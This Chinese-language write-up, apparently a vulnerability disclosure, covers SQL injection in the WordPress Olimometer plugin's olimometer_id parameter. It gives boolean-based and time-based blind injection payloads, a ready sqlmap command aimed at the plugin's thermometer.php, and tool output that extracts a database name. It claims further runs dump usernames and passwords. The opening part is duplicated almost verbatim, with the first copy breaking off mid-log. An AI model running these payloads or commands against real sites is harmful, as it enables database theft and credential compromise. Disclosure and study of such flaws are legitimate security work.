漏洞参数: olimometer_id= 使用sqlmap ``` Parameter: olimometer_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: olimometer_id=1 AND 6227=6227 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: olimometer_id=1 AND SLEEP(5) ``` “olimometer_id”参数使用SQL方法,我们能够从example.com实例网站获得数据库名称。如果有这样的漏洞,使用不同的参数运行SQLmap,我们可以得到完整的数据库,包括用户名和密码。 攻击示例,如下: ``` root@kali:~# sqlmap -u http://EXAMPLE.COM/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1 --dbs --threads=5 --random-agent --no-cast --- Parameter: olimometer_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: olimometer_id=1 AND 6227=6227 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: olimometer_id=1 AND SLEEP(5) --- [11:14:21] [INFO] the back-end DBMS is MySQL web application technology: Nginx back-end DBMS: MySQL >= 5.0.12 [11:14:21] [INFO] fetching database names...
漏洞参数: olimometer_id= 使用sqlmap ``` Parameter: olimometer_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: olimometer_id=1 AND 6227=6227 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: olimometer_id=1 AND SLEEP(5) ``` “olimometer_id”参数使用SQL方法,我们能够从example.com实例网站获得数据库名称。如果有这样的漏洞,使用不同的参数运行SQLmap,我们可以得到完整的数据库,包括用户名和密码。 攻击示例,如下: ``` root@kali:~# sqlmap -u http://EXAMPLE.COM/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1 --dbs --threads=5 --random-agent --no-cast --- Parameter: olimometer_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: olimometer_id=1 AND 6227=6227 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: olimometer_id=1 AND SLEEP(5) --- [11:14:21] [INFO] the back-end DBMS is MySQL web application technology: Nginx back-end DBMS: MySQL >= 5.0.12 [11:14:21] [INFO] fetching database names [11:14:21] [INFO] fetching number of databases [11:14:21] [INFO] retrieved: [11:14:21] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically [11:14:21] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done) [11:14:26] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions [11:14:26] [ERROR] unable to retrieve the number of databases [11:14:26] [INFO] falling back to current database [11:14:26] [INFO] fetching current database [11:14:26] [INFO] retrieving the length of query output [11:14:26] [INFO] retrieved: [11:14:28] [INFO] heuristics detected web page charset 'ascii' 14 [11:15:26] [INFO] retrieved: *****_wrdp1 available databases [1]: [*] *****_wrdp1 ```
